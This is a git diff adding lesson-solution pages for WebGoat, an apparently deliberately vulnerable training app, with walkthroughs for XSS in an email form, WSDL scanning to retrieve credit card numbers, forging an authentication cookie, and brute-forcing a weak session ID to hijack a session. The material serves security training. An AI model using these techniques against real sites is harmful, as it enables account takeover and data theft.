new file mode 100644
index 000000000..fd3b3d48e
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/TraceXSS_files/image002.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/TraceXSS_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/TraceXSS_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/TraceXSS_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail.html b/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail.html
new file mode 100644
index 000000000..8ea6ca3e4
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail.html
@@ -0,0 +1,672 @@
+
+
+
+
+
+
Lesson Plan Title: How to Exploit Unchecked Email
+
+
+
+
Concept / Topic To Teach:
+
+
It is always
+a good practice to validate all inputs. Most sites allow non-authenticated users
+to send e-mail to a 'friend'. This is a great mechanism for spammers to send
+out email using your corporate mail server.
+
+
+
+
General Goal(s):
+
+
The user
+should be able to send an obnoxious email message.
+
+
+
+
Solution:
+
+
Type a
+malicious script like <script>alert("XSS")</script> and click Send!
+
+
+
+
+
+
Figure 1 Lesson 5
+
+
+
+
+
+
+
+
+
+
Figure 2 Part 1 completed
+
+
+
+
The second
+part of this lesson is to send a mail to a friend from OWASP. This can be
+accomplished by intercepting the request with WebScarab and changing the hidden
+field "to" from webgoat.admin@owasp.org
+to bill.gates@microsoft.com
+
+
+
+
+
+
Figure 3 Change the variable to another e-mail
+address
+
+
+
+
+
+
Figure 4 Lesson 5 Completed
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/image001.png
new file mode 100644
index 000000000..4c5655e62
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/image002.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/image002.jpg
new file mode 100644
index 000000000..62a30cf94
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/image002.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/image003.png
new file mode 100644
index 000000000..8fd3ad15c
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/image004.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/image004.jpg
new file mode 100644
index 000000000..2a5943d8f
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/image004.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/image005.png
new file mode 100644
index 000000000..861f3dc14
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/image006.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/image006.jpg
new file mode 100644
index 000000000..fae87c128
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/image006.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/image007.png b/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/image007.png
new file mode 100644
index 000000000..46049533d
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/image007.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/image008.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/image008.jpg
new file mode 100644
index 000000000..fe5aa8442
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/image008.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/UncheckedEmail_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning.html b/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning.html
new file mode 100644
index 000000000..b39269ea1
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning.html
@@ -0,0 +1,724 @@
+
+
+
+
+
+
Lesson
+Plan Title: How to
+Perform WSDL Scanning
+
+
+
+
Concept /
+Topic To Teach:
+
+
Web
+Services communicate through the use of SOAP requests. These requests are
+submitted to a web service in an attempt to execute a function defined in the
+web service definition language (WSDL) file.
+
+
+
+
General
+Goal(s):
+
+
This screen
+is the API for a web service. Check the WSDL file for this web service and try
+to get some customer credit numbers.
+
+
+
+
+
+
Figure 1 Lesson 22
+
+
+
+
Solution:
+
+
+
+
Open the WSDL
+file in a new window. There is an operation getCreditCard.
+
+
+
+
+
+
+
+
Intercept the
+request with WebScarab and change the parameter to getCreditCard
+
+
+
+
+
+
Figure 2 WebScarab raw request
+
+
+
+
+
+
Figure 3 Lesson 22 Completed
+
+
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/image001.png
new file mode 100644
index 000000000..3268c9b0a
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/image003.png
new file mode 100644
index 000000000..25ea1988a
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/image005.png
new file mode 100644
index 000000000..63f42f9de
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/image007.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/image007.png
new file mode 100644
index 000000000..9ca7703d6
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/image007.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/image009.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/image009.jpg
new file mode 100644
index 000000000..fb0e23ea9
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/image009.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/image010.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/image010.jpg
new file mode 100644
index 000000000..cb7259343
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/image010.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/image011.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/image011.jpg
new file mode 100644
index 000000000..300095af6
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/image011.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/image012.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/image012.jpg
new file mode 100644
index 000000000..2d00abf25
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/image012.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WSDLScanning_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie.html b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie.html
new file mode 100644
index 000000000..926440486
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie.html
@@ -0,0 +1,915 @@
+
+
+
+Solution: Spoof an Authentication Cookie
+
+
+
Lesson
+Plan Title: How to
+Spoof an Authentication Cookie
+
+
+
+
Concept / Topic To Teach:
+
+
+
+
Many
+applications will automatically log a user into their site if the right
+authentication cookie is specified. Some times the cookie values can be
+guessed if the algorithm for generating the cookie can be obtained. Some
+times the cookies are left on the client machine and can be stolen by
+exploiting another system vulnerability. Some times the cookies maybe
+intercepted using Cross site scripting. This lesson tries to make the
+student aware of authentication cookies and presents the student with a way to
+defeat the cookie authentication method in this lesson.
+
+
+
+
General Goal(s):
+
+
The user
+should be able to bypass the authentication check.
+
+
+
+
Solution:
+
+
+
+
Make sure
+that you have "Show Cookies" enabled in WebGoat. And you need to disable the
+feature "Inject know cookies into requests" in WebScarab otherwise WebScarab
+will always inject your old cookie and not the new cookie.
+
+
+
+
+
+
Figure 1 Disable "Inject known cookies into
+requests"
+
+
+
+
+
+
Figure 2 Logon with webgoat/webgoat
+
+
+
+
You can login
+with webgoat/webgoat.
+
+
+
+
+
+
Figure 3 Logged on as webgoat
+
+
+
+
Hit
+"Refresh". This refresh will show our AuthCookie. And you are now authenticated
+using this cookie and not with parameters like above.
+
+
+
+
+
+
+
+
There is a
+new cookie called AuthCookie with values 65432ubphcfx. Logout and login with
+aspect/aspect.
+
+
+
+
+
+
Figure 4 Logon as aspect/aspect
+
+
+
+
+
+
Figure 5 Logged on as aspect
+
+
+
+
Hit "Refresh"
+to see the new cookie.
+
+
+
+
+
+
Figure 6 Cookie for user aspect
+
+
+
+
You have now
+a different cookie value for AuthCookie: 65432udfgfb
+
+
+
+
+
+
+ webgoat
+
+
+ ubphcfx
+
+
+
+
+ Aspect
+
+
+ udfgfb
+
+
+
+
+
+
+
This is an transposition
+of the letters of the alphabet. Each letter is replaced with its successor, for
+example t->u, a->b and the user name is reversed. So for user name alice
+
+
+
+
Login with
+user name alice
+
+
+
+
+
+
+
+
+
+
Figure 7 Add AuthCookie to request
+
+
+
+
+
+
Figure 8 Lesson 11 Completed
+
+
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image001.png
new file mode 100644
index 000000000..edac8c19a
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image003.png
new file mode 100644
index 000000000..0306a8f1f
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image005.png
new file mode 100644
index 000000000..7afb889fe
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image007.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image007.png
new file mode 100644
index 000000000..5c6c3d9c8
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image007.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image009.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image009.png
new file mode 100644
index 000000000..6d110d265
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image009.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image011.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image011.png
new file mode 100644
index 000000000..6831d62bf
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image011.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image013.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image013.png
new file mode 100644
index 000000000..c04235add
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image013.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image015.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image015.png
new file mode 100644
index 000000000..b0a6eceb4
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image015.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image017.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image017.png
new file mode 100644
index 000000000..78a1feb74
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image017.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image019.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image019.jpg
new file mode 100644
index 000000000..a6e68a265
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image019.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image020.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image020.jpg
new file mode 100644
index 000000000..338a42ed8
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image020.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image021.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image021.jpg
new file mode 100644
index 000000000..c1662c8f0
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image021.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image022.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image022.jpg
new file mode 100644
index 000000000..96f7253fd
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image022.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image023.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image023.jpg
new file mode 100644
index 000000000..c856ee032
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image023.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image024.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image024.jpg
new file mode 100644
index 000000000..1cbf8ff3a
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image024.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image025.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image025.jpg
new file mode 100644
index 000000000..d9b59af8b
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image025.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image026.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image026.jpg
new file mode 100644
index 000000000..5d30443e1
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image026.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image027.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image027.jpg
new file mode 100644
index 000000000..dec137dce
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/image027.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakAuthenticationCookie_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID.html b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID.html
new file mode 100644
index 000000000..2bfff1bc5
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID.html
@@ -0,0 +1,90 @@
+
+
+
+Solution: How to Hijack a Session
+Lesson Plan Title: How to Hijack a Session
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+Solution: Tools -> use full-featured interface in WebScarab.Previous Requests dropdown to select the most recent GET request with a 200 OK header. Its address will end with webgoat/attack, not an image or java file.Selecting the correct GET request for Session ID analysis. Test button at the bottom of the page. You should get a popup window showing the WEAKID.Succesful WEAKID test popup. WEAKID=value; portion of the Cookie header and press test again.Samples field at the bottom of the window, then press Fetch . Switch to the "Analysis" tab. Select the WEAKID option from the Session Identifier dropdown, and the window should populate with WEAKID values.Analysis screen with the cookie of interest highlighted. 16964 -131247243937516966 -131247243948416965 is missing. This is the WEAKID we want, we just need to figure out the second part.16964-1312472439375 16965-????????????? 16966-1312472439484 1312472439375 and 1312472439484 . Now we just need a program to do brute force this for us. We will use J-Baah , previously known as Crowbar. Download it and run the .jar.16965 in our case. How do we fill in the rest when we dont know what it is?WEAKID=16965-1312472439##1## ; to the Cookie paramter of our request. The ##1## From as 375, and To as 484.J-Baah setup. Host to localhost and the Port to whichever port WebGoat is using, generally 80 or 8080.Base Response . You should see a message on the bottom left that a response is generated successfully. Change Threads to 2 and then press Start . The bottom left window should start filling up with "Hijack a session"All of the responses for each WEAKID. The successful attempt is highlighted. ##1## string is replaced with a different number in the range we specified and the request is sent. The first WEAKID tried is 16965-1312472439375 , then it tries every timestamp until the last one, 16965-1312472439484 . J-Baah collects all of these responses and shows them in the bottom left window.0.99969 : 417 : : Hijack a Session0.99969 : 417 : : Hijack a Session ##1## in our request.0.99969 : 417 : : Hijack a Session This WEAKID worked! We hijacked this session. Solution: How to Hijack a Session
+
+
+
+
+
Lesson
+Plan Title: How to
+Hijack a Session
+
+
+
+
Concept /
+Topic To Teach:
+
+
+
+
Application
+developers who develop their own session IDs frequently forget to incorporate
+the complexity and randomness necessary for security. If the user specific
+session ID is not complex and random, then the application is highly
+susceptible to session-based brute force attacks.
+
+
+
+
General
+Goal(s):
+
+
Try to access
+an authenticated session belonging to someone else.
+
+
+
+
+
+
In this
+lesson the purpose is to predict the WEAKID value. The WEAKID is used to
+differentiate authenticated and anonymous users of WebGoat.
+
+
+
+
+
+
+
+
+
+
Solution:
+
+
+
+
The easiest
+way to complete this lesson is to use WebScarab's Session ID Analysis.
+
+
+
+
Go to
+WebScarab and click on the button "SessionID Analysis". Select the last POST
+request from the "Previous requests" drop-down box.
+
+
+
+
Figure 1 WebScarabs SessionID Analysis
+
+
+
+
To make sure
+that WebScarab is able to fetch the WEAKID cookie, you need to click the "Test"
+button on the bottom of the screen. A pop-up window must be shown like below.
+
+
+
+
+
+
Figure 2 SessionID WEAKID discovered
+
+
+
+
If you don’t
+have a pop-up window with the Extracted Sessionids, you must edit the Request.
+You must delete the WEAKID value from the request. Without this cookie value,
+WebGoat will return a HTTP Header "Set-Cookie: WEAKID=value" so WebScarab
+learns about this value.
+
+
+
+
+
+
Fetch 50
+samples and examine the results. Enter "50" in the "Samples" window and click
+the button "Fetch". You will not see any information about progress.
+
+
+
+
+
+
+
+
Now you need
+to go to the tab "Analysis".
+
+
+
+
+
+
+
+
In the "Analysis"
+pane you see nothing.
+
+
+
+
You must
+select the Session Identifier WEAKID value from the drop-down box.
+
+
+
+
+
+
+
+
The WEAKID is
+divided in 2 parts: the first part is an identifier that is added 1 in every
+cookie and a time value. The time value is calculated at the moment that you
+submit the request.
+
+
+
+
Notice that
+there is sometimes a gap in the first value of the WEAKID, skipping with 1. The
+value that is missing is the value that you need to know to log on. Now you
+only need to calculate the timestamp. This can be brute-forced using Crowbar.
+You know the previous timestamp and the next timestamp so you have a start and
+end value.http://www.sensepost.com/research/crowbar/
+
+
+
+
+
+
+
+
+
There is a
+value 16935 and a value 16937 with a numeric difference of 28110 instead of
+14109, so there the WEAKID cookie is located. Copy and paste the raw HTTP
+request in Crowbar:
+
+
+
+
Figure 3 Crowbar
+
+
+
+
Change target
+to localhost and adjust the port.
+
+
Create a Base
+response. Make sure that you see "How to hijack a session" in the middle
+window.
+
+
+
+
Insert ##1##
+in the WEAKID parameter where you want to brute-force the value and be aware, that the first part of the WEAKID is the one we are searching for (16936).
+The WEAKID in Crowbar lookes like this: Cookie: JSESSIONID=...; WEAKID=16936 -1163685##1## ;
+
+
Examine the
+results until you see a different fuzzy logic value (the blue line in Figure 3), right-click it and click on "Show
+reply".
+
+
+
+
+
+
Figure 4 Lesson 12 Completed
+
+
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_files/image001.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_files/image001.jpg
new file mode 100644
index 000000000..7309a0035
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_files/image001.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_files/image002.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_files/image002.jpg
new file mode 100644
index 000000000..3b442cc42
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_files/image002.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_files/image003.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_files/image003.jpg
new file mode 100644
index 000000000..21ce9ef3d
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_files/image003.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_files/image004.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_files/image004.jpg
new file mode 100644
index 000000000..52b78aaca
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_files/image004.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_files/image005.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_files/image005.jpg
new file mode 100644
index 000000000..bbc01ffc1
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_files/image005.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_files/image006.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_files/image006.jpg
new file mode 100644
index 000000000..27ca4296d
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_files/image006.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image001.png
new file mode 100644
index 000000000..560ca80c0
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image003.png
new file mode 100644
index 000000000..f0100265e
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image005.png
new file mode 100644
index 000000000..c42733b93
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image007.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image007.png
new file mode 100644
index 000000000..a34c6751c
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image007.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image010.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image010.png
new file mode 100644
index 000000000..0c6fe9313
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image010.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image012.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image012.png
new file mode 100644
index 000000000..46b787813
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image012.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image014.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image014.png
new file mode 100644
index 000000000..bde7fd0bd
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image014.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image016.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image016.png
new file mode 100644
index 000000000..d25bc4167
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image016.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image018.png b/webgoat-5.4/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image018.png
new file mode 100644
index 000000000..bb0344681
